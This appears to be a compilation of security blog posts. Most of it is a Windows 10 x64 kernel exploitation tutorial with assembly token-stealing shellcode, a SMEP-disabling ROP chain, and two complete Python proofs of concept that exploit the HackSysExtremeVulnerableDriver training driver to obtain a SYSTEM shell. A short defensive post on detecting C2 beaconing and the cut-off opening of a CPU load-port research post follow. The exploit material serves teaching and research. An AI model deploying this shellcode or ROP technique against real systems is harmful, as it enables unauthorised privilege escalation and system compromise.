Take a look at the RefCnt element. This is a value, appended to the access token, that keeps track of references of the access token. On x86, this is 3 bits. On x64 (which is our current architecture) this is 4 bits, as shown above. We want to clear these bits out, using bitwise AND. That way, we just extract the actual value of the Token, and not other unnecessary metadata.

To extract the value of the token, we simply need to view the _EX_FAST_REF union of the SYSTEM process at an offset of 0x358 (which is where our token resides). From there, we can figure out how to go about clearing out RefCnt.

dt nt!_EX_FAST_REF <Process address>+0x358

As you can see, RefCnt is equal to 0y0111. 0y denotes a binary value. So this means RefCnt in this instance equals 7 in decimal.

So, let’s use bitwise AND to try to clear out those last few bits.

? TOKEN & 0xf

As you can see, the result is 7- the RefCnt bits, which is exactly the part we do not want. Logic tells us we should instead AND with the inverse of 0xf (~0xf, i.e. 0xFFFFFFFFFFFFFFF0), which clears those low 4 bits and keeps the rest of the value intact.
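
As a quick worked example with a made-up token value (Python used purely for the arithmetic- the real value comes from the WinDbg output above):

token_field = 0xffff8e81c7f18067      # hypothetical _EX_FAST_REF value read at _EPROCESS + 0x358
print(hex(token_field & 0xf))         # 0x7 - the RefCnt metadata
print(hex(token_field & ~0xf))        # 0xffff8e81c7f18060 - the raw access token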

So- we have finally extracted the value of the raw access token. At this point, let’s see what happens when we copy this token to a normal cmd.exe session.

Opening a new cmd.exe process on the debuggee machine:

After spawning a cmd.exe process on the debuggee, let’s identify the process address in the debugger.

!process 0 0 cmd.exe

As you can see, the process address for our cmd.exe process is located at 0xffffe6028694d580. We also know, based on our research earlier, that the Token of a process is located at an offset of 0x358 from the process address. Let’s use WinDbg to overwrite the cmd.exe access token with the access token of the SYSTEM process.
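
The overwrite itself is a single quadword write- something along these lines, using the process address found above and the masked SYSTEM token value (both will differ on every boot):

eq ffffe6028694d580+0x358 <SYSTEM token value>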

Now, let’s take a look back at our previous cmd.exe process.

As you can see, cmd.exe has become a privileged process! Now the only question remains- how do we do this dynamically with a piece of shellcode?

Assembly? Who Needs It. I Will Never Need To Know That- It’s iRrElEvAnT

‘Nuff said.

Anyways, let’s develop an assembly program that can dynamically perform the above tasks in x64.

So let’s start with this logic- instead of spawning a cmd.exe process and then copying the SYSTEM process access token to it- why don’t we just copy the access token to the current process when exploitation occurs? The current process during exploitation should be the process that triggers the vulnerability (the process the exploit code is run from). From there, we could spawn cmd.exe from (and in the context of) our current process after our exploit has finished. That cmd.exe process would then have administrative privilege.

Before we can get there though, let’s look into how we can obtain information about the current process.

If you use the Microsoft Docs (formerly known as MSDN) to look into process data structures you will come across this article. This article states there is a Windows API function that can identify the current process and return a pointer to it! PsGetCurrentProcess() is that function. This Windows API function identifies the current thread and then returns a pointer to the process in which that thread is found. This is identical to IoGetCurrentProcess(); however, Microsoft recommends users invoke PsGetCurrentProcess() instead. Let’s unassemble that function in WinDbg.

uf nt!PsGetCurrentProcess

Let’s take a look at the first instruction mov rax, qword ptr gs:[188h]. As you can see, the GS segment register is in use here. This register points to a data segment, used to access different types of data structures. If you take a closer look at this segment, at an offset of 0x188 bytes, you will see KiInitialThread. This is a pointer to the _KTHREAD entry in the current thread’s _ETHREAD structure. As a point of clarification, know that _KTHREAD is the first entry in the _ETHREAD structure. The _ETHREAD structure is the thread object for a thread (similar to how _EPROCESS is the process object for a process) and will display more granular information about a thread. nt!KiInitialThread is the address of that _ETHREAD structure. Let’s take a closer look.

dqs gs:[188h]

This shows the GS segment register, at an offset of 0x188, holds an address of 0xffffd500e0c0cc00 (different on your machine because of ASLR/KASLR). This should be the nt!KiInitialThread, or the _ETHREAD structure for the current thread. Let’s verify this with WinDbg.

!thread -p

As you can see, we have verified that nt!KiInitialThread represents the address of the current thread.

Recall what was mentioned about threads and processes earlier. Threads are the part of a process that actually perform execution of code (for our purposes, these are kernel threads). Now that we have identified the current thread, let’s identify the process associated with that thread (which would be the current process). Let’s go back to the image above where we unassembled the PsGetCurrentProcess() function.

mov rax, qword ptr [rax+0B8h]

RAX already contains the value of the GS segment register at an offset of 0x188 (which contains the current thread). The above assembly instruction will move the value of nt!KiInitialThread + 0xB8 into RAX. Logic tells us this has to be the location of our current process, as the only instruction left in the PsGetCurrentProcess() routine is a ret. Let’s investigate this further.

Since we believe this is going to be our current process, let’s view this data in an _EPROCESS structure.

dt nt!_EPROCESS poi(nt!KiInitialThread+0xb8)

First, a little WinDbg kung-fu. poi essentially dereferences a pointer, which means obtaining the value a pointer points to.

And as you can see, we have found where our current process is! The PID for the current process at this time is the SYSTEM process (PID = 4). This is subject to change depending on what is executing, etc. But, it is very important we are able to identify the current process.

Let’s start building out an assembly program that tracks what we are doing.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		    ; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	    ; Current process (_EPROCESS)
  	mov rbx, rax			    ; Copy current process (_EPROCESS) to rbx

Notice that I copied the current process, stored in RAX, into RBX as well. You will see why this is needed here shortly.

Take Me For A Loop!

Let’s take a look at a few more elements of the _EPROCESS structure.

dt nt!_EPROCESS

Let’s take a look at the data structure of ActiveProcessLinks, _LIST_ENTRY

dt nt!_LIST_ENTRY

ActiveProcessLinks is what keeps track of the list of current processes. How does it keep track of these processes you may be wondering? Its data structure is _LIST_ENTRY, a doubly linked list. This means that each element in the linked list not only points to the next element, but it also points to the previous one. Essentially, the elements point in each direction. As mentioned earlier and just as a point of reiteration, this linked list is responsible for keeping track of all active processes.

There are two elements of _EPROCESS we need to keep track of. The first element, located at an offset of 0x2e0 on Windows 10 x64, is UniqueProcessId. This is the PID of the process. The other element is ActiveProcessLinks, which is located at an offset 0x2e8.

So essentially what we can do in x64 assembly is locate the current process from the aforementioned method of PsGetCurrentProcess(). From there, we can iterate and loop through the _EPROCESS structure’s ActiveProcessLinks element (which keeps track of every process via a doubly linked list). After reading in the current ActiveProcessLinks element, we can compare the current UniqueProcessId (PID) to the constant 4, which is the PID of the SYSTEM process. Let’s continue our already started assembly program.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	; Current process (_EPROCESS)
  	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
	
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

Once the SYSTEM process’s _EPROCESS structure has been found, we can now go ahead and retrieve the token and copy it to our current process. This will unleash God mode on our current process. God, please have mercy on the soul of our poor little process.

Once we have found the SYSTEM process, remember that the Token element is located at an offset of 0x358 to the _EPROCESS structure of the process.

Let’s finish out the rest of our token stealing payload for Windows 10 x64.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]		; Current process (_EPROCESS)
	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

	mov rcx, [rbx + 0x358]		; SYSTEM token is @ offset _EPROCESS + 0x358
	and cl, 0xf0			; Clear out _EX_FAST_REF RefCnt
	mov [rax + 0x358], rcx		; Copy SYSTEM token to current process

	xor rax, rax			; set NTSTATUS SUCCESS
	ret				; Done!

Notice our use of bitwise AND. We are clearing out the last 4 bits of the RCX register, via the CL register. If you have read my post about a socket reuse exploit, you will know I talk about using the lower byte registers of the x86 or x64 registers (RCX, ECX, CX, CH, CL, etc). The last 4 bits we need to clear out, in an x64 architecture, are located in the low or L 8-bit register (CL, AL, BL, etc).

As you can see also, we ended our shellcode by using bitwise XOR to clear out RAX. NTSTATUS uses RAX as the register for the error code. NTSTATUS, when a value of 0 is returned, means the operation was performed successfully.

Before we go ahead and show off our payload, let’s develop an exploit that outlines bypassing SMEP. We will use a stack overflow as an example, in the kernel, to outline using ROP to bypass SMEP.

SMEP Says Hello

What is SMEP? SMEP, or Supervisor Mode Execution Prevention, is a protection that was first implemented in Windows 8 (in the context of Windows). When we talk about executing code for a kernel exploit, the most common technique is to allocate the shellcode in user mode and then call it from the kernel. This means the user mode code will be called in the context of the kernel, giving us the applicable permissions to obtain SYSTEM privileges.

SMEP is a prevention that does not allow us to execute code stored in a ring 3 page from ring 0 (executing code from a higher ring in general). This means we cannot execute user mode code from kernel mode. In order to bypass SMEP, let’s understand how it is implemented.

SMEP policy is mandated/enabled via the CR4 register. According to Intel, the CR4 register is a control register. Each bit in this register is responsible for various features being enabled on the OS. The 20th bit of the CR4 register is responsible for SMEP being enabled. If the 20th bit of the CR4 register is set to 1, SMEP is enabled. When the bit is set to 0, SMEP is disabled. Let’s take a look at the CR4 register on Windows with SMEP enabled in normal hexadecimal format, as well as binary (so we can really see where that 20th bit resides).

r cr4

The CR4 register has a value of 0x00000000001506f8 in hexadecimal. Let’s view that in binary, so we can see where the 20th bit resides.

.formats cr4

As you can see, the 20th bit is outlined in the image above (counting from the right). Let’s use the .formats command again to see what the value in the CR4 register needs to be, in order to bypass SMEP.

As you can see from the above image, when the 20th bit of the CR4 register is flipped, the hexadecimal value would be 0x00000000000506f8.
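
A quick way to double-check that arithmetic (a throwaway Python snippet, not part of the exploit):

cr4 = 0x00000000001506f8
print(hex(cr4 & ~(1 << 20)))   # 0x506f8 - value with SMEP (bit 20) cleared
print(bool(cr4 & (1 << 20)))   # True   - SMEP is currently enabled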

This post will cover how to bypass SMEP via ROP using the above information. Before we do, let’s talk a bit more about SMEP implementation and other potential bypasses.

SMEP is ENFORCED via the page table entry (PTE) of a memory page through the form of “flags”. Recall that a page table is what contains information about which part of physical memory maps to virtual memory. The PTE for a memory page has various flags that are associated with it. Two of those flags are U, for user mode, and S, for supervisor mode (kernel mode). This flag is checked when said memory is accessed by the memory management unit (MMU). Before we move on, let’s talk about CPU modes for a second. Ring 3 is responsible for user mode application code. Ring 0 is responsible for operating system level code (kernel mode). The CPU can transition its current privilege level (CPL) based on what is executing. I will not get into the lower level details of syscalls, sysrets, or other various routines that occur when the CPU changes the CPL. This is also not a blog on how paging works. If you are interested in learning more, I HIGHLY suggest the book What Makes It Page: The Windows 7 (x64) Virtual Memory Manager by Enrico Martignetti. Although this is specific to Windows 7, I believe these same concepts apply today. I give this background information because SMEP bypasses could potentially abuse this functionality.

Think of the implementation of SMEP as the following:

Laws are created by the government. HOWEVER, the legislatures do not roam the streets enforcing the law. This is the job of our police force.

The same concept applies to SMEP. SMEP is enabled by the CR4 register- but the CR4 register does not enforce it. That is the job of the page table entries.

Why bring this up? Although we will be outlining a SMEP bypass via ROP, let’s consider another scenario. Let’s say we have an arbitrary read and write primitive. Put aside the fact that PTEs are randomized for now. What if you had a read primitive to know where the PTE for the memory page of your shellcode was? Another potential (and interesting) way to bypass SMEP would be not to “disable SMEP” at all. Let’s think outside the box! Instead of “going to the mountain”- why not “bring the mountain to us”? We could potentially use our read primitive to locate our user mode shellcode page, and then use our write primitive to overwrite the PTE for our shellcode and flip the U (user mode) flag into an S (supervisor mode) flag! That way, when that particular address is executed, although it is a “user mode address”, it is still executed- because now the permissions of that page are those of a kernel mode page.

Although page table entries are randomized now, this presentation by Morten Schenk of Offensive Security talks about derandomizing page table entries.

Morten explains the steps as the following, if you are too lazy to read his work:

  1. Obtain read/write primitive
  2. Leak ntoskrnl.exe (kernel base)
  3. Locate MiGetPteAddress() (can be done dynamically instead of static offsets)
  4. Use PTE base to obtain PTE of any memory page
  5. Change bit (whether it is copying shellcode to page and flipping NX bit or flipping U/S bit of a user mode page)

Again, I will not be covering this method of bypassing SMEP until I have done more research on memory paging in Windows. See the end of this blog for my thoughts on other SMEP bypasses going forward.

SMEP Says Goodbye

Let’s use a stack overflow to outline bypassing SMEP with ROP. ROP assumes we have control over the stack (as each ROP gadget returns back to the stack). Since SMEP is enabled, our ROP gadgets will need to come from kernel mode pages. Since we are assuming medium integrity here, we can call EnumDeviceDrivers() to obtain the kernel base- which bypasses KASLR.

Essentially, here is how our ROP chain will work

-------------------
pop <reg> ; ret
-------------------
VALUE_WANTED_IN_CR4 (0x506f8) - This can be our own user supplied value.
-------------------
mov cr4, <reg> ; ret
-------------------
User mode payload address
-------------------

Let’s go hunting for these ROP gadgets. (NOTE - ALL OFFSETS TO ROP GADGETS WILL VARY DEPENDING ON OS, PATCH LEVEL, ETC.) Remember, these ROP gadgets need to be kernel mode addresses. We will use rp++ to enumerate rop gadgets in ntoskrnl.exe. If you take a look at my post about ROP, you will see how to use this tool.

Let’s figure out a way to control the contents of the CR4 register. Although we probably won’t be able to manipulate the contents of CR4 directly, perhaps we can move the contents of a register that we can control into the CR4 register. Recall that a pop <reg> operation will take the contents of the next item on the stack, and store it in the register following the pop operation. Let’s keep this in mind.

Using rp++, we have found a nice ROP gadget in ntoskrnl.exe that allows us to move the contents of the ECX register (the lower 32 bits of the RCX register) into CR4.

As you can see, this ROP gadget is “located” at 0x140108552. Since this is a kernel mode address, rp++ (running from user mode and not as an administrator) will not give us the full address. However, if you strip the leading 0x140 (the default image base), the rest of the “address” is really an offset from the kernel base. This means this ROP gadget is located at ntoskrnl.exe + 0x108552.

Awesome! rp++ was a bit wrong in its enumeration. rp++ says that we can put ECX into the CR4 register. However, upon further inspection, we can see this ROP gadget ACTUALLY points to a mov cr4, rcx instruction. This is perfect for our use case! We have a way to move the contents of the RCX register into the CR4 register. You may be asking “Okay, we can control the CR4 register via the RCX register- but how does this help us?” Recall one of the properties of ROP from my previous post. Whenever we had a nice ROP gadget that allowed a desired instruction, but there was an unnecessary pop in the gadget, we used filler data of NOPs. This is because we are just simply placing data in a register- we are not executing it.

The same principle applies here. If we can pop our intended flag value into RCX, we should have no problem. As we saw before, our intended CR4 register value should be 0x506f8.

Real quick, for brevity’s sake- let’s say rp++ was right and we could only control the contents of the ECX register (instead of RCX). Would this affect us?

Recall, however, how the registers work here.

-----------------------------------
               RCX
-----------------------------------
                       ECX
-----------------------------------
                             CX
-----------------------------------
                           CH    CL
-----------------------------------

This means, even though RCX contains 0x00000000000506f8, a mov cr4, ecx would take the lower 32 bits of RCX (which is ECX) and place them into the CR4 register. This would mean ECX would equal 0x000506f8- and that value would end up in CR4. So even though we would, due to the lack of pop ecx ROP gadgets, theoretically be using both RCX and ECX, we will be unaffected!

Now, let’s continue on to controlling the RCX register.

Let’s find a pop rcx gadget!

Nice! We have a ROP gadget located at ntoskrnl.exe + 0x3544. Let’s update our POC with some breakpoints where our user mode shellcode will reside, to verify we can hit our shellcode. This POC takes care of the semantics such as finding the offset to the ret instruction we are overwriting, etc.

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\xCC" * 50
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = "\x41" * 2056

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		# Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x222003 = IOCTL code that will jump to the TriggerStackOverflow() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

Let’s take a look in WinDbg.

As you can see, we have hit the ret we are going to overwrite.

Before we step through, let’s view the call stack- to see how execution will proceed.

k

Open the image above in a new tab if you are having trouble viewing.

To help better understand the output of the call stack, the column Call Site is going to be the memory address that is executed. The RetAddr column is where the Call Site address will return to when it is done completing.

As you can see, the compromised ret is located at HEVD!TriggerStackOverflow+0xc8. From there we will return to 0xfffff80302c82544, or AuthzBasepRemoveSecurityAttributeValueFromLists+0x70. The next value in the RetAddr column, is the intended value for our CR4 register, 0x00000000000506f8.

Recall that a ret instruction will load RSP into RIP. Therefore, since our intended CR4 value is located on the stack, technically our first ROP gadget would “return” to 0x00000000000506f8. However, the pop rcx will take that value off of the stack and place it into RCX. Meaning we do not have to worry about returning to that value, which is not a valid memory address.

Upon the ret from the pop rcx ROP gadget, we will jump into the next ROP gadget, mov cr4, rcx, which will load RCX into CR4. That ROP gadget is located at 0xfffff80302d87552, or KiFlushCurrentTbWorker+0x12. To finish things out, we have the location of our user mode code, at 0x0000000000b70000.

After stepping through the vulnerable ret instruction, we see we have hit our first ROP gadget.

Now that we are here, stepping through should pop our intended CR4 value into RCX.

Perfect. Stepping through, we should land on our next ROP gadget- which will move RCX (desired value to disable SMEP) into CR4.

Perfect! Let’s disable SMEP!

Nice! As you can see, after our ROP gadgets are executed - we hit our breakpoints (placeholder for our shellcode to verify SMEP is disabled)!

This means we have successfully disabled SMEP, and we can execute usermode shellcode! Let’s finalize this exploit with a working POC. We will merge our payload concepts with the exploit now! Let’s update our script with weaponized shellcode!

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xE8\x02\x00\x00"                      # mov rbx,[rbx+0x2e8] ; ActiveProcessLinks
    "\x48\x81\xEB\xE8\x02\x00\x00"                      # sub rbx,0x2e8       ; Go back to current process
    "\x48\x8B\x8B\xE0\x02\x00\x00"                      # mov rcx,[rbx+0x2e0] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x348
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x83\xC4\x40"                                  # add rsp, 0x40       ; RESTORE (Specific to HEVD)
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = ("\x41" * 2056)

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		        # Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x222003 = IOCTL code that will jump to the TriggerStackOverflow() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

os.system("cmd.exe /k cd C:\\")

This shellcode adds 0x40 to RSP as you can see from above. This is specific to the process I was exploiting, to resume execution. Also in this case, RAX was already set to 0. Therefore, there was no need to xor rax, rax.

As you can see, SMEP has been bypassed!

SMEP Bypass via PTE Overwrite

Perhaps in another blog I will come back to this. I am going to go back and do some more research on the memory management unit and memory paging in Windows. When that research has concluded, I will get into the low level details of overwriting page table entries to turn user mode pages into kernel mode pages. In addition, I will go and do more research on pool memory in kernel mode and look into how pool overflows and use-after-free kernel exploits function and behave.

Thank you for joining me along this journey! And thank you to Morten Schenk, Alex Ionescu, and Intel. You all have aided me greatly.

Please feel free to contact me with any suggestions, comments, or corrections! I am open to it all.

Peace, love, and positivity :-)

Hunting for beacons

By: Fox IT
15 January 2020 at 11:29

Author: Ruud van Luijk

Attackers need to have a form of communication with their victim machines, also known as Command and Control (C2) [1]. This can take the form of a continuous connection, or of connecting to the victim machine directly. However, it is often more convenient to have the victim machine connect to you. In other words: it has to communicate back. This blog describes a method to detect one technique utilized by many popular attack frameworks, based solely on connection metadata and statistics, in turn enabling the method to be used on multiple log sources.

Many attack frameworks use beaconing

Frameworks like Cobalt Strike, PoshC2, and Empire, but also some run-of-the-mill malware, frequently check in with the C2 server to retrieve commands or to communicate results back. In Cobalt Strike this is called a beacon, but the concept is similar for many contemporary frameworks. In this blog the term ‘beaconing’ is used as a general term for the call-backs of malware. Previous fingerprinting research [2] shows that there are more than a thousand Cobalt Strike servers online in a month that are actively used by several threat actors, making this an important point to focus on.

While the underlying code differs slightly from tool to tool, they often consist of two components to set up a pattern for a connection: a sleep and a jitter. The sleep component indicates how long the beacon has to sleep before checking in again, and the jitter modifies the sleep time so that a random pattern emerges. For example: 60 seconds of sleep with 10% jitter results in a uniformly random sleep between 54 and 66 seconds (PoshC2 [3], Empire [4]) or a uniformly random sleep between 54 and 60 seconds (Cobalt Strike [5]). Note the slight difference in calculation.
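
To make that difference in calculation concrete, here is a small Python illustration (an approximation of the behaviour described above, not the frameworks’ actual code):

import random

sleep, jitter = 60, 0.10

# PoshC2 / Empire style: jitter applied in both directions
posh_like = random.uniform(sleep * (1 - jitter), sleep * (1 + jitter))   # 54 .. 66 seconds

# Cobalt Strike style: jitter only shortens the sleep
cs_like = sleep - random.uniform(0, sleep * jitter)                      # 54 .. 60 seconds

print(round(posh_like, 1), round(cs_like, 1))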

This jitter weakens the pattern but will not dissolve the pattern entirely. Moreover, due to the uniform distribution used for the sleep function the jitter is symmetrical. This is in our advantage while detecting this behaviour!

Detecting the beacon

While static signatures are often sufficient in detecting attacks, this is not the case for beaconing. Most frameworks are very customizable to your needs and preferences. This makes it hard to write correct and reliable signatures. Yet, the pattern does not change that much. Therefore, our objective is to find a beaconing pattern in seemingly pattern less connections in real-time using a more anomaly-based method. We encourage other blue teams/defenders to do the same.

Since the average and median of the time between the connections is more or less constant, we can look for connections where the times between consecutive connections constantly stay within a certain range. Regular traffic should not follow such a pattern. For example, it typically makes a few fast consecutive connections, then pauses for a longer time, and then shows some interaction again. Using a wider range will detect the beacons with a lot of jitter, but more legitimate traffic will also fall in the wider range. There is a clear trade-off between false positives and accounting for more jitter.

In order to track the pattern of connections, we create connection pairs. For example, an IP that connects to a certain host can be expressed as ‘10.0.0.1 -> somerandomhost.com’. This is done for all connection pairs in the network. We will deep dive into one connection pair.

In the image above, a beacon is simulated for the pair ‘10.0.0.1 -> somerandomhost.com’ with a sleep of 1 second and a jitter of 20%, i.e. a range between 0.8 and 1.2 seconds, while the model is set to detect a maximum of 25% jitter. Our model follows the expected timing of the beacon, as all connections remain within the lower and upper bound. In general, the more connections reside within this bandwidth, the more likely it is that there is some sort of beaconing. Even when a beacon has a jitter of 50% and our model has a bandwidth of 25%, it is still expected that half of the beacons will fall within the specified bandwidth.

Even when the configuration of the beacon changes, this method will catch up. The figure above illustrates a change from one to two seconds of sleep whilst maintaining a 10% jitter. There is a small period after the change where the connections break through the bandwidth, but after several connections the model catches up.

This method can work with any connection pair you want to track. Possibilities include IPs, HTTP(s) hosts, DNS requests, etc. Since it works on only the metadata, this will also help you to hunt for domain fronted beacons (keeping in mind your baseline).

Keep in mind the false positives

Although most regular traffic will not follow a constant pattern, this method will most likely result in several false positives. Every connection that runs on a timer will produce exactly the same pattern as beaconing. Examples of such connections are Windows telemetry, software updates, and custom update scripts. Therefore, some baselining is necessary before using this method for alerting. Still, hunting will always be possible without baselining!

Conclusion

Hunting for C2 beacons proves to be a worthwhile exercise, and real world scenarios confirm the effectiveness of this approach. Depending on the size of the network logs, this method can plow through a month of logs within an hour due to its simplicity. Even when the hunting exercise does not yield malicious results, there are often other applications that act on specific time intervals and are also worth investigating, removing, or altering. This method will not work when an adversary uses a 100% jitter, but keep in mind that this will probably annoy your adversary, so it's still a win!

References:

[1]. https://attack.mitre.org/tactics/TA0011/

[2]. https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/

[3]. https://github.com/nettitude/PoshC2/blob/master/C2-Server.ps1

https://github.com/nettitude/PoshC2_Python/blob/4aea6f957f4aec00ba1f766b5ecc6f3d015da506/Files/Implant-Core.ps1

[4]. https://github.com/EmpireProject/Empire/blob/master/data/agent/agent.ps1

[5]. https://www.cobaltstrike.com/help-beacon

CPU Introspection: Intel Load Port Snooping

30 December 2019 at 04:11

Load sequence example

Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!


Foreword

First of all, I’d like to say that I’m super excited to write up this blog. This is an idea I’ve had for over a year and only recently got around to working on. The initial implementation and proof-of-concept of this idea was actually implemented live on my Twitch! This proof-of-concept went from nothing at all to a fully-working-as-predicted implementation in just about 3 hours! Not only did the implementation go much smoother than expected, the results are by far higher resolution and signal-to-noise than I expected!

